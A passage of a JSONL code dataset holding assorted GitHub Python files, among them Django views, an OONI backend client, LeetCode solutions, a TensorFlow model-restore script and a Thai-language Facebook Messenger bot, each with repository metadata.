wx.Button(panel,201,u'打开',pos=(70,100))\n self.Centre()\n\n wx.EVT_BUTTON(self,201,self.onOpen)\n\n def onOpen(self,event):\n dlg=wx.MessageDialog(None,u'你好,加油!',u'对话框',wx.YES_NO|wx.ICON_QUESTION)\n res=dlg.ShowModal()\n dlg.Destroy()\n\nif __name__=='__main__':\n app=wx.App()\n frame=MyDialog(None,-1,u'对话框示例1')\n frame.Show()\n app.MainLoop()\n","repo_name":"ganmk/python-prctice","sub_path":"py-wxpython弹出窗.py","file_name":"py-wxpython弹出窗.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32090455912","text":"from rest_framework import status\nfrom rest_framework.views import APIView\n\nfrom base.helpers.response import custom_response\nfrom products.models import Product, Stock\nfrom products.stock.serializers import StockSerializer\nfrom base.helpers.decorators import write_permissions\n\n\nclass CreateEditOrDelete(APIView):\n @write_permissions\n def post(self, request, **kwargs):\n try:\n data = request.data\n data['product'] = Product.objects.get(pk=kwargs['pk'])\n\n stock = Stock.objects.create(**data)\n\n return custom_response(\n message='Stock created successfully',\n status=status.HTTP_201_CREATED,\n data=StockSerializer(stock).data\n )\n\n except Exception as e:\n return custom_response(\n message=str(e),\n status=status.HTTP_400_BAD_REQUEST\n )\n\n @write_permissions\n def put(self, request, **kwargs):\n try:\n data = request.data\n data['product'] = Product.objects.get(pk=kwargs['pk'])\n stock = Stock.objects.edit(**data)\n\n return custom_response(\n message='Stock edited successfully',\n status=status.HTTP_200_OK,\n data=StockSerializer(stock).data\n )\n\n except Exception as e:\n return custom_response(\n message=str(e),\n status=status.HTTP_400_BAD_REQUEST\n )\n","repo_name":"calinvladth/history","sub_path":"2020/4_beauty_shop/server/products/stock/views/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8615587126","text":"import time\nimport board\nimport busio\nimport adafruit_lsm9ds1\nimport math\n\ni2c = busio.I2C(board.SCL, board.SDA)\nsensor = adafruit_lsm9ds1.LSM9DS1_I2C(i2c)\n\nwhile True:\n\taccel_x, accel_y, accel_z = sensor.acceleration\n\tmag_x, mag_y, mag_z = sensor.magnetic\n\tgyro_x, gyro_y, gyro_z = sensor.gyro\n\ttemp = sensor.temperature\n\n\tunit_accel_x, unit_accel_y, unit_accel_z = 0, 0, 0\n\taccel_magnitude = math.sqrt(accel_x**2 + accel_y**2 + accel_z**2)\n\tif accel_magnitude is not 0:\n\t\tunit_accel_x = accel_x/accel_magnitude\n\t\tunit_accel_y = accel_y/accel_magnitude\n\t\tunit_accel_z = accel_z/accel_magnitude\n\n\troll = math.atan2(unit_accel_y, unit_accel_z) * 180/math.pi\n\tpitch = math.atan2((-unit_accel_x), math.sqrt(unit_accel_y**2 + unit_accel_z**2)) * 180/math.pi\n","repo_name":"kungminlin/ESCAL_Adafruit-LSM9DS1-RPi","sub_path":"condensed_lsm9ds1.py","file_name":"condensed_lsm9ds1.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70095571368","text":"import operator\nfrom model import data_manager, util\nfrom typing import List\n# from datetime import date\n# from datetime import datetime\n\nDATAFILE = \"model/hr/hr.csv\"\nheaders = [\"Id\", \"Name\", \"Date of birth\", \"Department\", \"Clearance\"]\n\nYEARS_OLD = 0\nNAME_INDEX=1\nDOB_INDEX=2\nDEPARTMENT_INDEX=3\nCLEARANCE_INDEX=4\nCURRENT_YEAR=2020\n\ndef get_employee():\n read_table = data_manager.read_table_from_file(\"model/hr/hr.csv\")\n \n return list(read_table)\n\ndef add_employee( arguments):\n list_of_employes= get_employee()\n Id = util.generate_id()\n arguments[0] = Id\n list_of_employes.append(arguments)\n \n new_list = data_manager.write_table_to_file(DATAFILE,list_of_employes)\n return new_list\n\n\n\ndef update_element(index:int, index_options:int, new_info:str):\n list_of_lists = get_employee()[1:] #bez header czyta\n list_of_lists[index][index_options] = new_info\n data_manager.write_table_to_file(DATAFILE, list_of_lists)\n\n\ndef show_employee(date_id:str):\n list_of_lists = get_employee()[1:] #bez header czyta\n for index, employee_list in enumerate(list_of_lists):\n if date_id in employee_list: \n return index, list_of_lists[index]\n\ndef delete_employee(index:int):\n list_of_lists = get_employee()[1:]\n del list_of_lists[index]\n data_manager.write_table_to_file(DATAFILE, list_of_lists)\n\ndef convert_date(a):\n return a\n # return list(map(int,a.split(\"-\")))\n\ndef date_1(list_of_employee):\n total_employee = get_employee()\n employes_birth = []\n for i in range(len(total_employee)):\n a = total_employee[i][DOB_INDEX]\n a = a.split(\"-\")\n employes_birth.append(a)\n return employes_birth\n \n \n \n\n\n\n\n","repo_name":"imarcins/ERP","sub_path":"SECURE ERP/model/hr/hr.py","file_name":"hr.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21245605244","text":"from lxml import html\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport win32api\r\n\r\nurl = 'https://news.google.com/topics/CAAqJggKIiBDQkFTRWdvSUwyMHZNRFp1ZEdvU0FtVnVHZ0pKVGlnQVAB?hl=en-IN&gl=IN&ceid=IN%3Aen'\r\n\r\npage = requests.get(url)\r\n\r\nsoup = BeautifulSoup(page.text, 'html.parser')\r\ntry:\r\n # cricket_score = soup.find_all('div',class_='HEZHfd')[:2]\r\n cricket_score = soup.find('div',class_='SOsZve').strings\r\n score = ' '.join(list(cricket_score))\r\n print(score)\r\n win32api.MessageBox(0,score, 'Cricket Score', 0x00001000) \r\n # print(len(cricket_score),type(cricket_score))\r\nexcept Exception as e:\r\n print(e)\r\n cricket_score = soup.find('div',class_='qCne4e').strings\r\n print(' '.join(list(cricket_score)))\r\n\r\n\r\n","repo_name":"bethegiver2020/seProjects","sub_path":"cricket_score.py","file_name":"cricket_score.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42716561062","text":"from django import template\n\nregister = template.Library()\n\n\n@register.filter(name='has_group')\ndef has_group(user, group_name):\n return user.groups.filter(name=group_name).exists()\n\n\n@register.filter(name='has_perm')\ndef has_perm(user, perm_name):\n all_perms = user.get_all_permissions()\n # print('Template Level has perms : ', has_perm)\n # print('Template Level ALL perms : ', all_perms)\n if perm_name in all_perms:\n return True\n else:\n return False\n\n\n@register.filter(name='joinby')\ndef joinby(value, arg):\n list =[]\n if value:\n list = value.split(\",\")\n return list\n","repo_name":"njNafir/django-onepage","sub_path":"onepage/templatetags/group_perm.py","file_name":"group_perm.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28898404967","text":"# https://leetcode.com/problems/permutations/\n# https://leetcode.com/problems/permutations/discuss/18296/Simple-Python-solution-(DFS).\nimport time\nfrom functools import wraps\n\ndef timing(func):\n @wraps(func)\n def time_count(*args, **kwargs):\n t_start = time.time()\n values = func(*args, **kwargs)\n t_end = time.time()\n print (f\"{func.__name__} time consuming: {(t_end - t_start):.3f} seconds\")\n return values\n return time_count\n\n\n# first thought, TC: O(N^N)\ndef permute(nums):\n n = len(nums)\n res = []\n def dfs(path):\n if len(path) == n:\n res.append(path)\n\n for num in nums:\n # prevent double arranging\n # O(n)\n if num not in path:\n # call n times\n dfs(path + [num])\n dfs([])\n return res\n\n\n# dfs, TC: O(N*(N!)^2), SC: O(N!) for recursive calls\ndef permute2(nums):\n n = len(nums)\n res = []\n def dfs(cands, path):\n if len(path)==n:\n res.append(path)\n return\n for i in range(len(cands)):\n # remove cands[i]\n # list slice, O(k)\n dfs(cands[:i] + cands[i+1:], path + [cands[i]])\n dfs(nums, [])\n return res\n\n# dfs, TC: O(N*N!), SC: O(N!) for recursive calls\ndef permute3(nums):\n n = len(nums)\n output = []\n def backtrack(first=0):\n # if all integers are used up\n if first == n:\n # copy nums, O(N)\n output.append(nums[:])\n for i in range(first, n):\n # place i-th integer first\n # in the current permutation\n nums[first], nums[i] = nums[i], nums[first]\n # use next integers to complete the permutations\n backtrack(first + 1)\n # backtrack\n nums[first], nums[i] = nums[i], nums[first]\n backtrack(0)\n return output\n\n# permute all combinations\ndef permute4(nums):\n res = []\n for i in range(1, len(nums)+1):\n coms = combine(nums, i)\n for com in coms:\n res.extend(permute3(com))\n return res\n\n# combinations\ndef combine(nums: list, k: int):\n res = []\n def backtrack(pos, path):\n if len(path) == k:\n # TC:O(k)\n res.append(path[:])\n # end\n return\n for i in range(pos, len(nums)):\n # add i+1 to path\n path.append(nums[i])\n # to next number\n backtrack(i + 1, path)\n # backtrack\n path.pop()\n backtrack(0, [])\n return res\n\nnums = [1,3,5,7,9,11,13,15]\n\ncom = combine([1,2,3], 3)\n\nres4 = permute4([1,2,3])\n\n@timing\ndef test(n=1000):\n for i in range(n):\n res = permute(nums)\n return res\n\n@timing\ndef test1(n=1000):\n for i in range(n):\n res = permute2(nums)\n return res\n\n@timing\ndef test2(n=1000):\n for i in range(n):\n res = permute3(nums)\n return res\n\nres = test(10)\nres1 = test1(10)\nres2 = test2(10)","repo_name":"ychanc2104/LeetCode","sub_path":"Permutations.py","file_name":"Permutations.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"7577322445","text":"import os\nimport json\n\nfrom urlparse import urljoin, urlparse\n\nfrom twisted.web.error import Error\nfrom twisted.web.client import Agent, Headers\nfrom twisted.internet import defer, reactor\nfrom twisted.internet.endpoints import TCP4ClientEndpoint\n\nfrom twisted.python.versions import Version\nfrom twisted import version as _twisted_version\n_twisted_14_0_2_version = Version('twisted', 14, 0, 2)\n\nfrom ooni import errors as e, constants\nfrom ooni.settings import config\nfrom ooni.utils import log, onion\nfrom ooni.utils.net import BodyReceiver, StringProducer, Downloader\nfrom ooni.utils.socks import TrueHeadersSOCKS5Agent\n\n\ndef guess_backend_type(address):\n if address is None:\n raise e.InvalidAddress\n if onion.is_onion_address(address):\n return 'onion'\n elif address.startswith('https://'):\n return 'https'\n elif address.startswith('http://'):\n return 'http'\n else:\n raise e.InvalidAddress\n\nclass OONIBClient(object):\n def __init__(self, address=None, settings={}):\n self.base_headers = {}\n self.backend_type = settings.get('type', None)\n self.base_address = settings.get('address', address)\n self.front = settings.get('front', '').encode('ascii')\n\n if self.backend_type is None:\n self.backend_type = guess_backend_type(self.base_address)\n self.backend_type = self.backend_type.encode('ascii')\n\n self.settings = {\n 'type': self.backend_type,\n 'address': self.base_address,\n 'front': self.front\n }\n self._setupBaseAddress()\n\n def _setupBaseAddress(self):\n parsed_address = urlparse(self.base_address)\n if self.backend_type == 'onion':\n if not onion.is_onion_address(self.base_address):\n log.err(\"Invalid onion address.\")\n raise e.InvalidAddress(self.base_address)\n if parsed_address.scheme in ('http', 'httpo'):\n self.base_address = (\"http://%s\" % parsed_address.netloc)\n else:\n self.base_address = (\"%s://%s\" % (parsed_address.scheme,\n parsed_address.netloc))\n elif self.backend_type == 'http':\n self.base_address = (\"http://%s\" % parsed_address.netloc)\n elif self.backend_type == 'https':\n self.base_address = (\"https://%s\" % parsed_address.netloc)\n elif self.backend_type == 'cloudfront':\n self.base_headers['Host'] = [parsed_address.netloc]\n self.base_address = (\"https://%s\" % self.front)\n self.base_address = self.base_address.encode('ascii')\n\n def isSupported(self):\n if self.backend_type in (\"https\", \"cloudfront\"):\n if _twisted_version < _twisted_14_0_2_version:\n log.err(\"HTTPS and cloudfronted backends require \"\n \"twisted > 14.0.2.\")\n return False\n elif self.backend_type == \"http\":\n if config.advanced.insecure_backend is not True:\n log.err(\"Plaintext backends are not supported. To \"\n \"enable at your own risk set \"\n \"advanced->insecure_backend to true\")\n return False\n elif self.backend_type == \"onion\":\n # XXX add an extra check to ensure tor is running\n if not config.tor_state and config.tor.socks_port is None:\n return False\n return True\n\n def isReachable(self):\n raise NotImplemented\n\n def _request(self, method, urn, genReceiver, bodyProducer=None, retries=3):\n if self.backend_type == 'onion':\n agent = TrueHeadersSOCKS5Agent(reactor,\n proxyEndpoint=TCP4ClientEndpoint(reactor,\n '127.0.0.1',\n config.tor.socks_port))\n else:\n agent = Agent(reactor)\n\n attempts = 0\n\n finished = defer.Deferred()\n\n def perform_request(attempts):\n uri = urljoin(self.base_address, urn)\n d = agent.request(method, uri, bodyProducer=bodyProducer,\n headers=Headers(self.base_headers))\n\n @d.addCallback\n def callback(response):\n try:\n content_length = int(response.headers.getRawHeaders('content-length')[0])\n except:\n content_length = None\n response.deliverBody(genReceiver(finished, content_length))\n\n def errback(err, attempts):\n # We we will recursively keep trying to perform a request until\n # we have reached the retry count.\n if attempts < retries:\n log.err(\"Lookup {} failed. Retrying.\".format(uri))\n attempts += 1\n perform_request(attempts)\n else:\n log.err(\"Failed. Giving up.\")\n finished.errback(err)\n\n d.addErrback(errback, attempts)\n\n perform_request(attempts)\n\n return finished\n\n def queryBackend(self, method, urn, query=None, retries=3):\n log.debug(\"Querying backend {0}{1} with {2}\".format(self.base_address,\n urn, query))\n bodyProducer = None\n if query:\n bodyProducer = StringProducer(json.dumps(query))\n\n def genReceiver(finished, content_length):\n def process_response(s):\n # If empty string then don't parse it.\n if not s:\n return\n try:\n response = json.loads(s)\n except ValueError:\n raise e.get_error(None)\n if 'error' in response:\n log.debug(\"Got this backend error message %s\" % response)\n raise e.get_error(response['error'])\n return response\n\n return BodyReceiver(finished, content_length, process_response)\n\n return self._request(method, urn, genReceiver, bodyProducer, retries)\n\n def download(self, urn, download_path):\n\n def genReceiver(finished, content_length):\n return Downloader(download_path, finished, content_length)\n\n return self._request('GET', urn, genReceiver)\n\nclass BouncerClient(OONIBClient):\n def isReachable(self):\n return defer.succeed(True)\n\n @defer.inlineCallbacks\n def lookupTestCollector(self, net_tests):\n try:\n test_collector = yield self.queryBackend('POST', '/bouncer/net-tests',\n query={'net-tests': net_tests})\n except Exception as exc:\n log.exception(exc)\n raise e.CouldNotFindTestCollector\n\n defer.returnValue(test_collector)\n\n @defer.inlineCallbacks\n def lookupTestHelpers(self, test_helper_names):\n try:\n test_helper = yield self.queryBackend('POST', '/bouncer/test-helpers',\n query={'test-helpers': test_helper_names})\n except Exception as exc:\n log.exception(exc)\n raise e.CouldNotFindTestHelper\n\n if not test_helper:\n raise e.CouldNotFindTestHelper\n\n defer.returnValue(test_helper)\n\n\nclass CollectorClient(OONIBClient):\n def isReachable(self):\n # XXX maybe in the future we can have a dedicated API endpoint to\n # test the reachability of the collector.\n d = self.queryBackend('GET', '/invalidpath')\n\n @d.addCallback\n def cb(_):\n # We should never be getting an acceptable response for a\n # request to an invalid path.\n return False\n\n @d.addErrback\n def err(failure):\n failure.trap(Error)\n return failure.value.status == '404'\n\n return d\n\n def getInputPolicy(self):\n return self.queryBackend('GET', '/policy/input')\n\n def getNettestPolicy(self):\n return self.queryBackend('GET', '/policy/nettest')\n\n def createReport(self, test_details):\n request = {\n 'software_name': test_details['software_name'],\n 'software_version': test_details['software_version'],\n 'probe_asn': test_details['probe_asn'],\n 'probe_cc': test_details['probe_cc'],\n 'test_name': test_details['test_name'],\n 'test_version': test_details['test_version'],\n 'test_start_time': test_details['test_start_time'],\n 'input_hashes': test_details['input_hashes'],\n 'data_format_version': test_details['data_format_version'],\n 'format': 'json'\n }\n # import values from the environment\n request.update([(k.lower(),v) for (k,v) in os.environ.iteritems()\n if k.startswith('PROBE_')])\n\n return self.queryBackend('POST', '/report', query=request)\n\n def updateReport(self, report_id, serialization_format, entry_content):\n request = {\n 'format': serialization_format,\n 'content': entry_content\n }\n return self.queryBackend('POST', '/report/%s' % report_id,\n query=request)\n\n\n def closeReport(self, report_id):\n return self.queryBackend('POST', '/report/' + report_id + '/close')\n\nclass WebConnectivityClient(OONIBClient):\n def isReachable(self):\n d = self.queryBackend('GET', '/status')\n\n @d.addCallback\n def cb(result):\n if result.get(\"status\", None) != \"ok\":\n return False\n return True\n\n @d.addErrback\n def err(_):\n return False\n\n return d\n\n def control(self, http_request, tcp_connect,\n http_request_headers=None,\n include_http_responses=False):\n if http_request_headers is None:\n http_request_headers = {}\n request = {\n 'http_request': http_request,\n 'tcp_connect': tcp_connect,\n 'http_request_headers': http_request_headers,\n 'include_http_responses': include_http_responses\n }\n return self.queryBackend('POST', '/', query=request)\n\n\ndef get_preferred_bouncer():\n preferred_backend = config.advanced.get(\n \"preferred_backend\", \"onion\"\n )\n bouncer_address = getattr(\n constants, \"CANONICAL_BOUNCER_{0}\".format(\n preferred_backend.upper()\n )\n )\n if preferred_backend == \"cloudfront\":\n return BouncerClient(\n settings={\n 'address': bouncer_address[0],\n 'front': bouncer_address[1],\n 'type': 'cloudfront'\n })\n else:\n return BouncerClient(bouncer_address)\n","repo_name":"ooni/probe-legacy","sub_path":"ooni/backend_client.py","file_name":"backend_client.py","file_ext":"py","file_size_in_byte":10907,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"1777830348","text":"import random\n\nSECURE = True\n\n# Beschreibung\n'''\nIn diesem Spiel geht es darum, eine Zufallszahl in möglichst wenigen Schritten zu erraten.\n'''\n\ndef isValid(text):\n text = text.lower()\n if 'spiel' in text and ('zahl' in text or 'erraten' in text):\n return True\n else:\n return False\n\ndef handle(text, tiane, local_storage):\n if tiane.telegram_call:\n zahl = random.randrange(1000)\n tipp = 0\n i = 0\n\n tiane.say('Ok, lasse uns spielen. Versuche die Zufallszahl in möglichst wenigen Schritten zu erraten')\n\n while tipp != zahl:\n tiane.say('Dein Tipp:')\n tipp = int(tiane.listen())\n\n if zahl < tipp:\n tiane.say(\"Die gesuchte Zahl ist kleiner als \" + str(tipp))\n if zahl > tipp:\n tiane.say(\"Die gesuchte Zahl ist größer als \" + str(tipp))\n i += 1\n\n tiane.say(\"Du hast die Zahl beim \" + str(i) + \". Tipp erraten! SUPER!\")\n\n else:\n tiane.say('Das Spiel kann leider nur über Telegram gespielt werden')\n","repo_name":"FerdiKr/TIANE","sub_path":"server/modules/guessNumberGame.py","file_name":"guessNumberGame.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"de","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"71214537767","text":"from django.test import SimpleTestCase\nfrom django.urls import reverse, resolve\nfrom incident.views import incident, login\n\nclass TestUrls(SimpleTestCase):\n def test_login_resolve(self):\n url = reverse('login')\n print(resolve(url))\n self.assertEquals(resolve(url).func, login)\n\n\n def test_incidents_resolve(self):\n url = reverse('incidents')\n print(resolve(url))\n self.assertEquals(resolve(url).func, incident)","repo_name":"kamal-na/IncidentsReportSystem","sub_path":"incident_report/incident/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38678429897","text":"'''\nWritten By Ronel B. Llarenas\nGithub.com/llarenas\n'''\n\nimport threading\n\nclass Mymessenger(threading.Thread):\n\n def run(self): # kailan sang amo ni nga functin every thread, pwede man isulod ang init functin dri.\n for _ in range(10): #kung ayaw mglagay m ng letter var. pwede _ lng ilagay\n print(threading.currentThread().getName()) #threading code para mag thread r mag run ang thread class..\n\nx = Mymessenger(name='send ur messages \\n')\ny = Mymessenger(name='receive')\nx.start() #basta thread, start ibutang imbes na ang classname.\ny.start()\n","repo_name":"llarenas/basic-Python-programs-that-can-help-beginners","sub_path":"putathreadingding.py","file_name":"putathreadingding.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6222382889","text":"class Solution:\n # @return a string\n def dfs(self, s, row, pos, nRows, d): # d = 0 means down, 1 means up\n if pos == len(s):\n return\n self.res[row].append(s[pos])\n if d == 0:\n d = 1 if row + 1 == nRows - 1 else 0\n self.dfs(s, row + 1, pos + 1, nRows, d)\n else:\n d = 0 if row - 1 == 0 else 1\n self.dfs(s, row - 1, pos + 1, nRows, d)\n \n def convert(self, s, nRows):\n self.res = []\n for i in range(nRows):\n self.res.append([])\n if nRows == 1:\n return s\n self.dfs(s, 0, 0, nRows, 0)\n s = ''\n for item in self.res:\n s += ''.join(item)\n return s","repo_name":"Shuaiyicao/leetcode-python","sub_path":"6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7510293017","text":"# Module 7: Convolutional Neural Network (CNN)\n# Restore CNN Model\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\nos.environ['TF_ENABLE_WINOGRAD_NONE_USED']='1'\n\nimport tensorflow as tf\n\n# Step 1: Restore Graph\nsess = tf.Session()\nsaver = tf.train.import_meta_graph('./models/mnist_cnn/mnist_cnn.ckpt.meta')\nsaver.restore(sess,tf.train.latest_checkpoint('./models/mnist_cnn'))\n\n\n# Step 2: Restore Input and Output\ngraph = tf.get_default_graph()\nX = graph.get_tensor_by_name(\"X:0\")\nyhat = graph.get_tensor_by_name(\"yhat:0\")\n\n\n# Step 3: Evaluation\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"mnist\", one_hot=True,reshape=False,validation_size=0)\n\nX_test = mnist.test.images\ny_test = mnist.test.labels\n\nimport numpy as np\nindex = np.random.randint(1,10000)\nX_test = X_test[index:index+1]\n\nprint(\"Actual answer : \",sess.run(tf.argmax(y_test[index])))\nprint(\"Predicted answer : \",sess.run(tf.argmax(yhat,1), feed_dict={X: X_test}))\n\n","repo_name":"ianlaiky/DeepLearningTensorflowNew","sub_path":"exercises/module7_3_cnn_mnist_restore_model.py","file_name":"module7_3_cnn_mnist_restore_model.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40712446602","text":"from flask import Blueprint, request\nimport requests\nimport json\nfrom pymongo import MongoClient\nfrom ..config import develop as default_config\nfrom datetime import datetime\nimport PyICU\nimport random\nfrom ..brain import function as function\n\nwebhook_blueprint = Blueprint('webhook', __name__)\nmongo = MongoClient('mongodb://db:27017')\n\nuser = mongo.db.users\n\ngreeting_dialog = ['สวัสดี','หวัดดี','ทักทาย','Hello','Greeting','ไง','hi']\ngreeting_ans_dialog_first = ['เมี๊ยว ยินดีที่ได้รู้จักนะคุณ ', 'เมี๊ยว สวัสดีคุณ ', 'เมี๊ยว ดีใจจังที่คุณ ']\ngreeting_ans_dialog_end = [' เหมียวสามารถช่วยคุณค้นหาโครงการได้นะ', ' เหมียวพร้อมช่วยคุณค้นหาโครงการแล้ว', ' ทักมาให้เหมียวเป็นตัวช่วยในการค้นหาโครงการ']\n\ndef send_message(sender_id, message_text):\n r = requests.post(\n 'https://graph.facebook.com/v2.6/me/messages',\n params={\n 'access_token': default_config.FB_PAGE_TOKEN\n },\n headers={\n 'Content-Type': 'application/json'\n },\n data=json.dumps({\n 'recipient': {'id': sender_id},\n 'message': {'text': message_text}\n }\n )\n )\n\n # print(r.json)\n return\n\ndef sendGeneric(sender_id, message_text):\n\n messageData = {\n 'attachment':{\n 'type': 'template',\n 'payload': {\n 'template_type':'generic',\n 'elements':[{\n 'title':'TEST1',\n 'subtitle':'THIS_IS_PAGE_1',\n 'image_url':'',\n 'buttons':[{\n 'type':'web_url',\n 'url':'https://taejai.com/th/projects/all/',\n 'title':'เวปไซต์เทใจ'\n },{\n 'type':'postback',\n 'title':'ต้องการให้ช่วย',\n 'payload':'ค้นหา'\n }]\n }]\n }\n }\n }\n\n r = requests.post(\n 'https://graph.facebook.com/v2.6/me/messages',\n params={\n 'access_token': default_config.FB_PAGE_TOKEN\n },\n headers={\n 'Content-Type': 'application/json'\n },\n data=json.dumps({\n 'recipient': {'id': sender_id},\n 'message': messageData\n }\n )\n )\n\n return\n\ndef guideline(sender_id, message_text):\n messageData = {\n 'attachment':{\n 'type': 'template',\n 'payload': {\n 'template_type':'generic',\n 'elements':[{\n 'title':'การใช้งานเบิ้องต้น',\n 'subtitle':'พิมพ์ ค้นหา เพื่อเริ่มต้นการค้นหาโครงการต่างๆ',\n 'image_url':'',\n 'buttons':[{\n 'type':'web_url',\n 'url':'https://taejai.com/th/projects/all/',\n 'title':'เวปไซต์เทใจ'\n },{\n 'type':'postback',\n 'title':'ค้นหาโครงการ',\n 'payload':'ค้นหา'\n }]\n }]\n }\n }\n }\n r = requests.post(\n 'https://graph.facebook.com/v2.6/me/messages',\n params={\n 'access_token': default_config.FB_PAGE_TOKEN\n },\n headers={\n 'Content-Type': 'application/json'\n },\n data=json.dumps({\n 'recipient': {'id': sender_id},\n 'message': messageData\n }\n )\n )\n return\n\ndef greeting(sender_id, message_text, doc):\n\n ranNum = random.randrange(len(greeting_ans_dialog_first))\n text = greeting_ans_dialog_first[ranNum]+doc['sender_name']+ greeting_ans_dialog_end[ranNum]\n\n messageData = {\n 'attachment':{\n 'type': 'template',\n 'payload': {\n 'template_type':'button',\n 'text':text,\n 'buttons':[{\n 'type':'postback',\n 'title':'ต้องการให้ช่วย',\n 'payload':'ค้นหา'\n }]\n }\n }\n }\n\n\n greeting_dict = ' เหมียวสามารถช่วยคุณค้นหาโครงการในเทใจได้นะ', ' เหมียวพร้อมช่วยคุณหาโครงการเสมอนะ', ' ทักมาให้เหมียวเป็นตัวช่วยในการค้นหาโครงงาน'\n # send_message(sender_id, 'เมี๊ยว สวัสดีคุณ'+doc['first_name']+' เหมียวสามารถช่วยคุณค้นหาโครงการในเทใจได้นะ')\n\n r = requests.post(\n 'https://graph.facebook.com/v2.6/me/messages',\n params={\n 'access_token': default_config.FB_PAGE_TOKEN\n },\n headers={\n 'Content-Type': 'application/json'\n },\n data=json.dumps({\n 'recipient': {'id': sender_id},\n 'message': messageData\n }\n )\n )\n print(r)\n # \"quick_replies\":[\n # {\n # \"content_type\":\"text\",\n # \"title\":\"\",\n # \"image_url\":\"http://example.com/img/red.png\",\n # \"payload\":\"\"\n # }\n # ]\n\n return\n\n@webhook_blueprint.route('/', methods=['GET'], strict_slashes=False)\ndef validate_webhook():\n if request.args.get('hub.verify_token', '') == default_config.FB_VERIFY_TOKEN:\n return request.args.get('hub.challenge', '')\n else:\n return 'Wrong validation token'\n\n\n@webhook_blueprint.route('/', methods=['POST'], strict_slashes=False)\ndef handle_message():\n data = request.get_json()\n if data and data['object'] == 'page':\n for entry in data['entry']:\n if 'messaging'not in entry:\n for postback_event in entry['standby']:\n sender_id = postback_event['sender']['id']\n message_text = postback_event['postback']['title']\n u = user.find({'sender_id' : sender_id}).sort(\"_id\",-1).limit(1)\n if u.count() > 0:\n for doc in u:\n if message_text.find('ค้นหา') != -1 or message_text.find('ต้องการให้ช่วย') != -1 or message_text.find('ค้นหาใหม่') != -1:\n searchProject(sender_id, message_text, doc)\n return ''\n for messaging_event in entry['messaging']:\n if messaging_event.get('message'):\n if messaging_event['sender']['id'] == '514129448794599':\n continue\n sender_id = messaging_event['sender']['id']\n message_text = messaging_event['message']['text']\n chatState = 0\n u = user.find({'sender_id' : sender_id}).sort(\"_id\",-1).limit(1)\n if u.count() > 0:\n for doc in u:\n words = tadkaam(message_text)\n for word in words:\n if word in greeting_dialog:\n greeting(sender_id, message_text, doc)\n user.insert({'sender_id' : sender_id,'sender_name':doc['sender_name'] ,'message_text' : message_text, 'chatState' :chatState})\n return ''\n if message_text.find('ค้นหา') != -1 or message_text.find('ต้องการให้ช่วย') != -1 or message_text.find('ค้นหาใหม่') != -1:\n searchProject(sender_id, message_text,doc)\n elif doc['chatState'] == 1:\n searchProject(sender_id,message_text,doc)\n elif message_text.find('ช่วยเหลือ') != -1 or message_text.find('ทำไรได้บ้าง') != -1:\n guideline(sender_id, message_text)\n elif (message_text.find('หมา') != -1 or message_text.find('แมว') != -1) and (message_text.find('ป่วย') != -1 or message_text.find('อาหาร') != -1):\n send_message(sender_id, 'ขณะนี้เหมียวเทใจยังไม่มีแนวทางรับเรื่องนี้ กรุณาติดต่อช่องทางอื่นๆก่อนนะ แต่ถ้ามีข่าวอัพเดทจะรีบแจ้งให้ทราบนะเมี๊ยว')\n else:\n # send_message(sender_id,'ยังไม่เข้าใจอ่ะเมี๊ยว')\n user.insert({'sender_id' : sender_id,'sender_name':doc['sender_name'] ,'message_text' : message_text, 'chatState' : chatState})\n else:\n r = requests.get('https://graph.facebook.com/v2.6/'+sender_id+'?access_token='+default_config.FB_PAGE_TOKEN)\n data = r.json()\n user.insert({'sender_id' : sender_id, 'sender_name' : data['first_name'], 'chatState' : 0})\n k = user.find({'sender_id' : sender_id}).sort(\"_id\",-1).limit(1)\n for doc in k:\n greeting(sender_id, message_text,doc)\n return ''\n\ndef sendProjectCard(result, sender_id):\n elements = []\n for cardData in result:\n elements.append({\"title\": cardData['name'], \"subtitle\" : \"เป้าหมาย \" + str(cardData['donation_limit']),\n \"image_url\":\"https://taejai.com/media/\" + cardData['cover_image'], \"buttons\": [{\"type\":\"web_url\",\"url\":\"https://taejai.com/th/d/\"+cardData['slug'],\"title\":\"เวปไซตโครงการ\"},{\"type\":\"web_url\",\"title\":\"บริจาค\",\"url\":\"https://taejai.com/th/d/\" + cardData['slug'] + '/#donate'}]})\n messageData = {\n 'attachment':{\n 'type': 'template',\n 'payload': {\n 'template_type':'generic',\n 'elements': elements\n }\n }\n }\n r = requests.post(\n 'https://graph.facebook.com/v2.6/me/messages',\n params={\n 